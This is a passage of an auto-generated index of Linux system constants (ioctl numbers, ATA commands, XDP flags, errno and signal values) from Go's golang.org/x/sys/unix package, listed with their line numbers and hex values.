WDIOF_EXTERN2 = 0x8 constant WDIOF_FANFAULT (line 3438) | WDIOF_FANFAULT = 0x2 constant WDIOF_KEEPALIVEPING (line 3439) | WDIOF_KEEPALIVEPING = 0x8000 constant WDIOF_MAGICCLOSE (line 3440) | WDIOF_MAGICCLOSE = 0x100 constant WDIOF_OVERHEAT (line 3441) | WDIOF_OVERHEAT = 0x1 constant WDIOF_POWEROVER (line 3442) | WDIOF_POWEROVER = 0x40 constant WDIOF_POWERUNDER (line 3443) | WDIOF_POWERUNDER = 0x10 constant WDIOF_PRETIMEOUT (line 3444) | WDIOF_PRETIMEOUT = 0x200 constant WDIOF_SETTIMEOUT (line 3445) | WDIOF_SETTIMEOUT = 0x80 constant WDIOF_UNKNOWN (line 3446) | WDIOF_UNKNOWN = -0x1 constant WDIOS_DISABLECARD (line 3447) | WDIOS_DISABLECARD = 0x1 constant WDIOS_ENABLECARD (line 3448) | WDIOS_ENABLECARD = 0x2 constant WDIOS_TEMPPANIC (line 3449) | WDIOS_TEMPPANIC = 0x4 constant WDIOS_UNKNOWN (line 3450) | WDIOS_UNKNOWN = -0x1 constant WEXITED (line 3451) | WEXITED = 0x4 constant WGALLOWEDIP_A_MAX (line 3452) | WGALLOWEDIP_A_MAX = 0x3 constant WGDEVICE_A_MAX (line 3453) | WGDEVICE_A_MAX = 0x8 constant WGPEER_A_MAX (line 3454) | WGPEER_A_MAX = 0xa constant WG_CMD_MAX (line 3455) | WG_CMD_MAX = 0x1 constant WG_GENL_NAME (line 3456) | WG_GENL_NAME = "wireguard" constant WG_GENL_VERSION (line 3457) | WG_GENL_VERSION = 0x1 constant WG_KEY_LEN (line 3458) | WG_KEY_LEN = 0x20 constant WIN_ACKMEDIACHANGE (line 3459) | WIN_ACKMEDIACHANGE = 0xdb constant WIN_CHECKPOWERMODE1 (line 3460) | WIN_CHECKPOWERMODE1 = 0xe5 constant WIN_CHECKPOWERMODE2 (line 3461) | WIN_CHECKPOWERMODE2 = 0x98 constant WIN_DEVICE_RESET (line 3462) | WIN_DEVICE_RESET = 0x8 constant WIN_DIAGNOSE (line 3463) | WIN_DIAGNOSE = 0x90 constant WIN_DOORLOCK (line 3464) | WIN_DOORLOCK = 0xde constant WIN_DOORUNLOCK (line 3465) | WIN_DOORUNLOCK = 0xdf constant WIN_DOWNLOAD_MICROCODE (line 3466) | WIN_DOWNLOAD_MICROCODE = 0x92 constant WIN_FLUSH_CACHE (line 3467) | WIN_FLUSH_CACHE = 0xe7 constant WIN_FLUSH_CACHE_EXT (line 3468) | WIN_FLUSH_CACHE_EXT = 0xea constant WIN_FORMAT (line 3469) | WIN_FORMAT = 0x50 constant WIN_GETMEDIASTATUS (line 3470) | WIN_GETMEDIASTATUS = 0xda constant WIN_IDENTIFY (line 3471) | WIN_IDENTIFY = 0xec constant WIN_IDENTIFY_DMA (line 3472) | WIN_IDENTIFY_DMA = 0xee constant WIN_IDLEIMMEDIATE (line 3473) | WIN_IDLEIMMEDIATE = 0xe1 constant WIN_INIT (line 3474) | WIN_INIT = 0x60 constant WIN_MEDIAEJECT (line 3475) | WIN_MEDIAEJECT = 0xed constant WIN_MULTREAD (line 3476) | WIN_MULTREAD = 0xc4 constant WIN_MULTREAD_EXT (line 3477) | WIN_MULTREAD_EXT = 0x29 constant WIN_MULTWRITE (line 3478) | WIN_MULTWRITE = 0xc5 constant WIN_MULTWRITE_EXT (line 3479) | WIN_MULTWRITE_EXT = 0x39 constant WIN_NOP (line 3480) | WIN_NOP = 0x0 constant WIN_PACKETCMD (line 3481) | WIN_PACKETCMD = 0xa0 constant WIN_PIDENTIFY (line 3482) | WIN_PIDENTIFY = 0xa1 constant WIN_POSTBOOT (line 3483) | WIN_POSTBOOT = 0xdc constant WIN_PREBOOT (line 3484) | WIN_PREBOOT = 0xdd constant WIN_QUEUED_SERVICE (line 3485) | WIN_QUEUED_SERVICE = 0xa2 constant WIN_READ (line 3486) | WIN_READ = 0x20 constant WIN_READDMA (line 3487) | WIN_READDMA = 0xc8 constant WIN_READDMA_EXT (line 3488) | WIN_READDMA_EXT = 0x25 constant WIN_READDMA_ONCE (line 3489) | WIN_READDMA_ONCE = 0xc9 constant WIN_READDMA_QUEUED (line 3490) | WIN_READDMA_QUEUED = 0xc7 constant WIN_READDMA_QUEUED_EXT (line 3491) | WIN_READDMA_QUEUED_EXT = 0x26 constant WIN_READ_BUFFER (line 3492) | WIN_READ_BUFFER = 0xe4 constant WIN_READ_EXT (line 3493) | WIN_READ_EXT = 0x24 constant WIN_READ_LONG (line 3494) | WIN_READ_LONG = 0x22 constant WIN_READ_LONG_ONCE (line 3495) | WIN_READ_LONG_ONCE = 0x23 constant WIN_READ_NATIVE_MAX (line 3496) | WIN_READ_NATIVE_MAX = 0xf8 constant WIN_READ_NATIVE_MAX_EXT (line 3497) | WIN_READ_NATIVE_MAX_EXT = 0x27 constant WIN_READ_ONCE (line 3498) | WIN_READ_ONCE = 0x21 constant WIN_RECAL (line 3499) | WIN_RECAL = 0x10 constant WIN_RESTORE (line 3500) | WIN_RESTORE = 0x10 constant WIN_SECURITY_DISABLE (line 3501) | WIN_SECURITY_DISABLE = 0xf6 constant WIN_SECURITY_ERASE_PREPARE (line 3502) | WIN_SECURITY_ERASE_PREPARE = 0xf3 constant WIN_SECURITY_ERASE_UNIT (line 3503) | WIN_SECURITY_ERASE_UNIT = 0xf4 constant WIN_SECURITY_FREEZE_LOCK (line 3504) | WIN_SECURITY_FREEZE_LOCK = 0xf5 constant WIN_SECURITY_SET_PASS (line 3505) | WIN_SECURITY_SET_PASS = 0xf1 constant WIN_SECURITY_UNLOCK (line 3506) | WIN_SECURITY_UNLOCK = 0xf2 constant WIN_SEEK (line 3507) | WIN_SEEK = 0x70 constant WIN_SETFEATURES (line 3508) | WIN_SETFEATURES = 0xef constant WIN_SETIDLE1 (line 3509) | WIN_SETIDLE1 = 0xe3 constant WIN_SETIDLE2 (line 3510) | WIN_SETIDLE2 = 0x97 constant WIN_SETMULT (line 3511) | WIN_SETMULT = 0xc6 constant WIN_SET_MAX (line 3512) | WIN_SET_MAX = 0xf9 constant WIN_SET_MAX_EXT (line 3513) | WIN_SET_MAX_EXT = 0x37 constant WIN_SLEEPNOW1 (line 3514) | WIN_SLEEPNOW1 = 0xe6 constant WIN_SLEEPNOW2 (line 3515) | WIN_SLEEPNOW2 = 0x99 constant WIN_SMART (line 3516) | WIN_SMART = 0xb0 constant WIN_SPECIFY (line 3517) | WIN_SPECIFY = 0x91 constant WIN_SRST (line 3518) | WIN_SRST = 0x8 constant WIN_STANDBY (line 3519) | WIN_STANDBY = 0xe2 constant WIN_STANDBY2 (line 3520) | WIN_STANDBY2 = 0x96 constant WIN_STANDBYNOW1 (line 3521) | WIN_STANDBYNOW1 = 0xe0 constant WIN_STANDBYNOW2 (line 3522) | WIN_STANDBYNOW2 = 0x94 constant WIN_VERIFY (line 3523) | WIN_VERIFY = 0x40 constant WIN_VERIFY_EXT (line 3524) | WIN_VERIFY_EXT = 0x42 constant WIN_VERIFY_ONCE (line 3525) | WIN_VERIFY_ONCE = 0x41 constant WIN_WRITE (line 3526) | WIN_WRITE = 0x30 constant WIN_WRITEDMA (line 3527) | WIN_WRITEDMA = 0xca constant WIN_WRITEDMA_EXT (line 3528) | WIN_WRITEDMA_EXT = 0x35 constant WIN_WRITEDMA_ONCE (line 3529) | WIN_WRITEDMA_ONCE = 0xcb constant WIN_WRITEDMA_QUEUED (line 3530) | WIN_WRITEDMA_QUEUED = 0xcc constant WIN_WRITEDMA_QUEUED_EXT (line 3531) | WIN_WRITEDMA_QUEUED_EXT = 0x36 constant WIN_WRITE_BUFFER (line 3532) | WIN_WRITE_BUFFER = 0xe8 constant WIN_WRITE_EXT (line 3533) | WIN_WRITE_EXT = 0x34 constant WIN_WRITE_LONG (line 3534) | WIN_WRITE_LONG = 0x32 constant WIN_WRITE_LONG_ONCE (line 3535) | WIN_WRITE_LONG_ONCE = 0x33 constant WIN_WRITE_ONCE (line 3536) | WIN_WRITE_ONCE = 0x31 constant WIN_WRITE_SAME (line 3537) | WIN_WRITE_SAME = 0xe9 constant WIN_WRITE_VERIFY (line 3538) | WIN_WRITE_VERIFY = 0x3c constant WNOHANG (line 3539) | WNOHANG = 0x1 constant WNOTHREAD (line 3540) | WNOTHREAD = 0x20000000 constant WNOWAIT (line 3541) | WNOWAIT = 0x1000000 constant WSTOPPED (line 3542) | WSTOPPED = 0x2 constant WUNTRACED (line 3543) | WUNTRACED = 0x2 constant XATTR_CREATE (line 3544) | XATTR_CREATE = 0x1 constant XATTR_REPLACE (line 3545) | XATTR_REPLACE = 0x2 constant XDP_COPY (line 3546) | XDP_COPY = 0x2 constant XDP_FLAGS_DRV_MODE (line 3547) | XDP_FLAGS_DRV_MODE = 0x4 constant XDP_FLAGS_HW_MODE (line 3548) | XDP_FLAGS_HW_MODE = 0x8 constant XDP_FLAGS_MASK (line 3549) | XDP_FLAGS_MASK = 0x1f constant XDP_FLAGS_MODES (line 3550) | XDP_FLAGS_MODES = 0xe constant XDP_FLAGS_REPLACE (line 3551) | XDP_FLAGS_REPLACE = 0x10 constant XDP_FLAGS_SKB_MODE (line 3552) | XDP_FLAGS_SKB_MODE = 0x2 constant XDP_FLAGS_UPDATE_IF_NOEXIST (line 3553) | XDP_FLAGS_UPDATE_IF_NOEXIST = 0x1 constant XDP_MMAP_OFFSETS (line 3554) | XDP_MMAP_OFFSETS = 0x1 constant XDP_OPTIONS (line 3555) | XDP_OPTIONS = 0x8 constant XDP_OPTIONS_ZEROCOPY (line 3556) | XDP_OPTIONS_ZEROCOPY = 0x1 constant XDP_PACKET_HEADROOM (line 3557) | XDP_PACKET_HEADROOM = 0x100 constant XDP_PGOFF_RX_RING (line 3558) | XDP_PGOFF_RX_RING = 0x0 constant XDP_PGOFF_TX_RING (line 3559) | XDP_PGOFF_TX_RING = 0x80000000 constant XDP_PKT_CONTD (line 3560) | XDP_PKT_CONTD = 0x1 constant XDP_RING_NEED_WAKEUP (line 3561) | XDP_RING_NEED_WAKEUP = 0x1 constant XDP_RX_RING (line 3562) | XDP_RX_RING = 0x2 constant XDP_SHARED_UMEM (line 3563) | XDP_SHARED_UMEM = 0x1 constant XDP_STATISTICS (line 3564) | XDP_STATISTICS = 0x7 constant XDP_TX_RING (line 3565) | XDP_TX_RING = 0x3 constant XDP_UMEM_COMPLETION_RING (line 3566) | XDP_UMEM_COMPLETION_RING = 0x6 constant XDP_UMEM_FILL_RING (line 3567) | XDP_UMEM_FILL_RING = 0x5 constant XDP_UMEM_PGOFF_COMPLETION_RING (line 3568) | XDP_UMEM_PGOFF_COMPLETION_RING = 0x180000000 constant XDP_UMEM_PGOFF_FILL_RING (line 3569) | XDP_UMEM_PGOFF_FILL_RING = 0x100000000 constant XDP_UMEM_REG (line 3570) | XDP_UMEM_REG = 0x4 constant XDP_UMEM_UNALIGNED_CHUNK_FLAG (line 3571) | XDP_UMEM_UNALIGNED_CHUNK_FLAG = 0x1 constant XDP_USE_NEED_WAKEUP (line 3572) | XDP_USE_NEED_WAKEUP = 0x8 constant XDP_USE_SG (line 3573) | XDP_USE_SG = 0x10 constant XDP_ZEROCOPY (line 3574) | XDP_ZEROCOPY = 0x4 constant XENFS_SUPER_MAGIC (line 3575) | XENFS_SUPER_MAGIC = 0xabba1974 constant XFS_SUPER_MAGIC (line 3576) | XFS_SUPER_MAGIC = 0x58465342 constant ZONEFS_MAGIC (line 3577) | ZONEFS_MAGIC = 0x5a4f4653 constant _HIDIOCGRAWNAME_LEN (line 3578) | _HIDIOCGRAWNAME_LEN = 0x80 constant _HIDIOCGRAWPHYS_LEN (line 3579) | _HIDIOCGRAWPHYS_LEN = 0x40 constant _HIDIOCGRAWUNIQ_LEN (line 3580) | _HIDIOCGRAWUNIQ_LEN = 0x40 constant E2BIG (line 3585) | E2BIG = syscall.Errno(0x7) constant EACCES (line 3586) | EACCES = syscall.Errno(0xd) constant EAGAIN (line 3587) | EAGAIN = syscall.Errno(0xb) constant EBADF (line 3588) | EBADF = syscall.Errno(0x9) constant EBUSY (line 3589) | EBUSY = syscall.Errno(0x10) constant ECHILD (line 3590) | ECHILD = syscall.Errno(0xa) constant EDOM (line 3591) | EDOM = syscall.Errno(0x21) constant EEXIST (line 3592) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 3593) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 3594) | EFBIG = syscall.Errno(0x1b) constant EINTR (line 3595) | EINTR = syscall.Errno(0x4) constant EINVAL (line 3596) | EINVAL = syscall.Errno(0x16) constant EIO (line 3597) | EIO = syscall.Errno(0x5) constant EISDIR (line 3598) | EISDIR = syscall.Errno(0x15) constant EMFILE (line 3599) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 3600) | EMLINK = syscall.Errno(0x1f) constant ENFILE (line 3601) | ENFILE = syscall.Errno(0x17) constant ENODEV (line 3602) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 3603) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 3604) | ENOEXEC = syscall.Errno(0x8) constant ENOMEM (line 3605) | ENOMEM = syscall.Errno(0xc) constant ENOSPC (line 3606) | ENOSPC = syscall.Errno(0x1c) constant ENOTBLK (line 3607) | ENOTBLK = syscall.Errno(0xf) constant ENOTDIR (line 3608) | ENOTDIR = syscall.Errno(0x14) constant ENOTTY (line 3609) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 3610) | ENXIO = syscall.Errno(0x6) constant EPERM (line 3611) | EPERM = syscall.Errno(0x1) constant EPIPE (line 3612) | EPIPE = syscall.Errno(0x20) constant ERANGE (line 3613) | ERANGE = syscall.Errno(0x22) constant EROFS (line 3614) | EROFS = syscall.Errno(0x1e) constant ESPIPE (line 3615) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 3616) | ESRCH = syscall.Errno(0x3) constant ETXTBSY (line 3617) | ETXTBSY = syscall.Errno(0x1a) constant EWOULDBLOCK (line 3618) | EWOULDBLOCK = syscall.Errno(0xb) constant EXDEV (line 3619) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 3624) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 3625) | SIGALRM = syscall.Signal(0xe) constant SIGFPE (line 3626) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 3627) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 3628) | SIGILL = syscall.Signal(0x4) constant SIGINT (line 3629) | SIGINT = syscall.Signal(0x2) constant SIGIOT (line 3630) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 3631) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 3632) | SIGPIPE = syscall.Signal(0xd) constant SIGQUIT (line 3633) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 3634) | SIGSEGV = syscall.Signal(0xb) constant SIGTERM (line 3635) | SIGTERM = syscall.Signal(0xf) constant SIGTRAP (line 3636) | SIGTRAP = syscall.Signal(0x5) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_386.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x80041270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x40041271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x1277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x1261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x1265 constant BLKFRASET (line 36) | BLKFRASET = 0x1264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x80081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x1260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x80041272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x1278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x1279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x127b constant BLKRAGET (line 43) | BLKRAGET = 0x1263 constant BLKRASET (line 44) | BLKRASET = 0x1262 constant BLKROGET (line 45) | BLKROGET = 0x125e constant BLKROSET (line 46) | BLKROSET = 0x125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x127e constant BLKRRPART (line 48) | BLKRRPART = 0x125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x1267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x1266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x1268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x81484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x80104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x800 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000 constant FF1 (line 83) | FF1 = 0x8000 constant FFDLY (line 84) | FFDLY = 0x8000 constant FICLONE (line 85) | FICLONE = 0x40049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x4020940d constant FLUSHO (line 87) | FLUSHO = 0x1000 constant FP_XSTATE_MAGIC2 (line 88) | FP_XSTATE_MAGIC2 = 0x46505845 constant FS_IOC_ENABLE_VERITY (line 89) | FS_IOC_ENABLE_VERITY = 0x40806685 constant FS_IOC_GETFLAGS (line 90) | FS_IOC_GETFLAGS = 0x80046601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 91) | FS_IOC_GET_ENCRYPTION_NONCE = 0x8010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 92) | FS_IOC_GET_ENCRYPTION_POLICY = 0x400c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 93) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x40106614 constant FS_IOC_SETFLAGS (line 94) | FS_IOC_SETFLAGS = 0x40046602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 95) | FS_IOC_SET_ENCRYPTION_POLICY = 0x800c6613 constant F_GETLK (line 96) | F_GETLK = 0xc constant F_GETLK64 (line 97) | F_GETLK64 = 0xc constant F_GETOWN (line 98) | F_GETOWN = 0x9 constant F_RDLCK (line 99) | F_RDLCK = 0x0 constant F_SETLK (line 100) | F_SETLK = 0xd constant F_SETLK64 (line 101) | F_SETLK64 = 0xd constant F_SETLKW (line 102) | F_SETLKW = 0xe constant F_SETLKW64 (line 103) | F_SETLKW64 = 0xe constant F_SETOWN (line 104) | F_SETOWN = 0x8 constant F_UNLCK (line 105) | F_UNLCK = 0x2 constant F_WRLCK (line 106) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 107) | HIDIOCGRAWINFO = 0x80084803 constant HIDIOCGRDESC (line 108) | HIDIOCGRDESC = 0x90044802 constant HIDIOCGRDESCSIZE (line 109) | HIDIOCGRDESCSIZE = 0x80044801 constant HUPCL (line 110) | HUPCL = 0x400 constant ICANON (line 111) | ICANON = 0x2 constant IEXTEN (line 112) | IEXTEN = 0x8000 constant IN_CLOEXEC (line 113) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 114) | IN_NONBLOCK = 0x800 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 115) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x7b9 constant ISIG (line 116) | ISIG = 0x1 constant IUCLC (line 117) | IUCLC = 0x200 constant IXOFF (line 118) | IXOFF = 0x1000 constant IXON (line 119) | IXON = 0x400 constant MAP_32BIT (line 120) | MAP_32BIT = 0x40 constant MAP_ANON (line 121) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 122) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 123) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 124) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 125) | MAP_GROWSDOWN = 0x100 constant MAP_HUGETLB (line 126) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 127) | MAP_LOCKED = 0x2000 constant MAP_NONBLOCK (line 128) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 129) | MAP_NORESERVE = 0x4000 constant MAP_POPULATE (line 130) | MAP_POPULATE = 0x8000 constant MAP_STACK (line 131) | MAP_STACK = 0x20000 constant MAP_SYNC (line 132) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 133) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 134) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 135) | MCL_ONFAULT = 0x4 constant MEMERASE (line 136) | MEMERASE = 0x40084d02 constant MEMERASE64 (line 137) | MEMERASE64 = 0x40104d14 constant MEMGETBADBLOCK (line 138) | MEMGETBADBLOCK = 0x40084d0b constant MEMGETINFO (line 139) | MEMGETINFO = 0x80204d01 constant MEMGETOOBSEL (line 140) | MEMGETOOBSEL = 0x80c84d0a constant MEMGETREGIONCOUNT (line 141) | MEMGETREGIONCOUNT = 0x80044d07 constant MEMISLOCKED (line 142) | MEMISLOCKED = 0x80084d17 constant MEMLOCK (line 143) | MEMLOCK = 0x40084d05 constant MEMREAD (line 144) | MEMREAD = 0xc03c4d1a constant MEMREADOOB (line 145) | MEMREADOOB = 0xc00c4d04 constant MEMSETBADBLOCK (line 146) | MEMSETBADBLOCK = 0x40084d0c constant MEMUNLOCK (line 147) | MEMUNLOCK = 0x40084d06 constant MEMWRITEOOB (line 148) | MEMWRITEOOB = 0xc00c4d03 constant MTDFILEMODE (line 149) | MTDFILEMODE = 0x4d13 constant NFDBITS (line 150) | NFDBITS = 0x20 constant NLDLY (line 151) | NLDLY = 0x100 constant NOFLSH (line 152) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 153) | NS_GET_NSTYPE = 0xb703 constant NS_GET_OWNER_UID (line 154) | NS_GET_OWNER_UID = 0xb704 constant NS_GET_PARENT (line 155) | NS_GET_PARENT = 0xb702 constant NS_GET_USERNS (line 156) | NS_GET_USERNS = 0xb701 constant OLCUC (line 157) | OLCUC = 0x2 constant ONLCR (line 158) | ONLCR = 0x4 constant OTPERASE (line 159) | OTPERASE = 0x400c4d19 constant OTPGETREGIONCOUNT (line 160) | OTPGETREGIONCOUNT = 0x40044d0e constant OTPGETREGIONINFO (line 161) | OTPGETREGIONINFO = 0x400c4d0f constant OTPLOCK (line 162) | OTPLOCK = 0x800c4d10 constant OTPSELECT (line 163) | OTPSELECT = 0x80044d0d constant O_APPEND (line 164) | O_APPEND = 0x400 constant O_ASYNC (line 165) | O_ASYNC = 0x2000 constant O_CLOEXEC (line 166) | O_CLOEXEC = 0x80000 constant O_CREAT (line 167) | O_CREAT = 0x40 constant O_DIRECT (line 168) | O_DIRECT = 0x4000 constant O_DIRECTORY (line 169) | O_DIRECTORY = 0x10000 constant O_DSYNC (line 170) | O_DSYNC = 0x1000 constant O_EXCL (line 171) | O_EXCL = 0x80 constant O_FSYNC (line 172) | O_FSYNC = 0x101000 constant O_LARGEFILE (line 173) | O_LARGEFILE = 0x8000 constant O_NDELAY (line 174) | O_NDELAY = 0x800 constant O_NOATIME (line 175) | O_NOATIME = 0x40000 constant O_NOCTTY (line 176) | O_NOCTTY = 0x100 constant O_NOFOLLOW (line 177) | O_NOFOLLOW = 0x20000 constant O_NONBLOCK (line 178) | O_NONBLOCK = 0x800 constant O_PATH (line 179) | O_PATH = 0x200000 constant O_RSYNC (line 180) | O_RSYNC = 0x101000 constant O_SYNC (line 181) | O_SYNC = 0x101000 constant O_TMPFILE (line 182) | O_TMPFILE = 0x410000 constant O_TRUNC (line 183) | O_TRUNC = 0x200 constant PARENB (line 184) | PARENB = 0x100 constant PARODD (line 185) | PARODD = 0x200 constant PENDIN (line 186) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 187) | PERF_EVENT_IOC_DISABLE = 0x2401 constant PERF_EVENT_IOC_ENABLE (line 188) | PERF_EVENT_IOC_ENABLE = 0x2400 constant PERF_EVENT_IOC_ID (line 189) | PERF_EVENT_IOC_ID = 0x80042407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 190) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x4004240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 191) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x40042409 constant PERF_EVENT_IOC_PERIOD (line 192) | PERF_EVENT_IOC_PERIOD = 0x40082404 constant PERF_EVENT_IOC_QUERY_BPF (line 193) | PERF_EVENT_IOC_QUERY_BPF = 0xc004240a constant PERF_EVENT_IOC_REFRESH (line 194) | PERF_EVENT_IOC_REFRESH = 0x2402 constant PERF_EVENT_IOC_RESET (line 195) | PERF_EVENT_IOC_RESET = 0x2403 constant PERF_EVENT_IOC_SET_BPF (line 196) | PERF_EVENT_IOC_SET_BPF = 0x40042408 constant PERF_EVENT_IOC_SET_FILTER (line 197) | PERF_EVENT_IOC_SET_FILTER = 0x40042406 constant PERF_EVENT_IOC_SET_OUTPUT (line 198) | PERF_EVENT_IOC_SET_OUTPUT = 0x2405 constant PPPIOCATTACH (line 199) | PPPIOCATTACH = 0x4004743d constant PPPIOCATTCHAN (line 200) | PPPIOCATTCHAN = 0x40047438 constant PPPIOCBRIDGECHAN (line 201) | PPPIOCBRIDGECHAN = 0x40047435 constant PPPIOCCONNECT (line 202) | PPPIOCCONNECT = 0x4004743a constant PPPIOCDETACH (line 203) | PPPIOCDETACH = 0x4004743c constant PPPIOCDISCONN (line 204) | PPPIOCDISCONN = 0x7439 constant PPPIOCGASYNCMAP (line 205) | PPPIOCGASYNCMAP = 0x80047458 constant PPPIOCGCHAN (line 206) | PPPIOCGCHAN = 0x80047437 constant PPPIOCGDEBUG (line 207) | PPPIOCGDEBUG = 0x80047441 constant PPPIOCGFLAGS (line 208) | PPPIOCGFLAGS = 0x8004745a constant PPPIOCGIDLE (line 209) | PPPIOCGIDLE = 0x8008743f constant PPPIOCGIDLE32 (line 210) | PPPIOCGIDLE32 = 0x8008743f constant PPPIOCGIDLE64 (line 211) | PPPIOCGIDLE64 = 0x8010743f constant PPPIOCGL2TPSTATS (line 212) | PPPIOCGL2TPSTATS = 0x80487436 constant PPPIOCGMRU (line 213) | PPPIOCGMRU = 0x80047453 constant PPPIOCGRASYNCMAP (line 214) | PPPIOCGRASYNCMAP = 0x80047455 constant PPPIOCGUNIT (line 215) | PPPIOCGUNIT = 0x80047456 constant PPPIOCGXASYNCMAP (line 216) | PPPIOCGXASYNCMAP = 0x80207450 constant PPPIOCSACTIVE (line 217) | PPPIOCSACTIVE = 0x40087446 constant PPPIOCSASYNCMAP (line 218) | PPPIOCSASYNCMAP = 0x40047457 constant PPPIOCSCOMPRESS (line 219) | PPPIOCSCOMPRESS = 0x400c744d constant PPPIOCSDEBUG (line 220) | PPPIOCSDEBUG = 0x40047440 constant PPPIOCSFLAGS (line 221) | PPPIOCSFLAGS = 0x40047459 constant PPPIOCSMAXCID (line 222) | PPPIOCSMAXCID = 0x40047451 constant PPPIOCSMRRU (line 223) | PPPIOCSMRRU = 0x4004743b constant PPPIOCSMRU (line 224) | PPPIOCSMRU = 0x40047452 constant PPPIOCSNPMODE (line 225) | PPPIOCSNPMODE = 0x4008744b constant PPPIOCSPASS (line 226) | PPPIOCSPASS = 0x40087447 constant PPPIOCSRASYNCMAP (line 227) | PPPIOCSRASYNCMAP = 0x40047454 constant PPPIOCSXASYNCMAP (line 228) | PPPIOCSXASYNCMAP = 0x4020744f constant PPPIOCUNBRIDGECHAN (line 229) | PPPIOCUNBRIDGECHAN = 0x7434 constant PPPIOCXFERUNIT (line 230) | PPPIOCXFERUNIT = 0x744e constant PR_SET_PTRACER_ANY (line 231) | PR_SET_PTRACER_ANY = 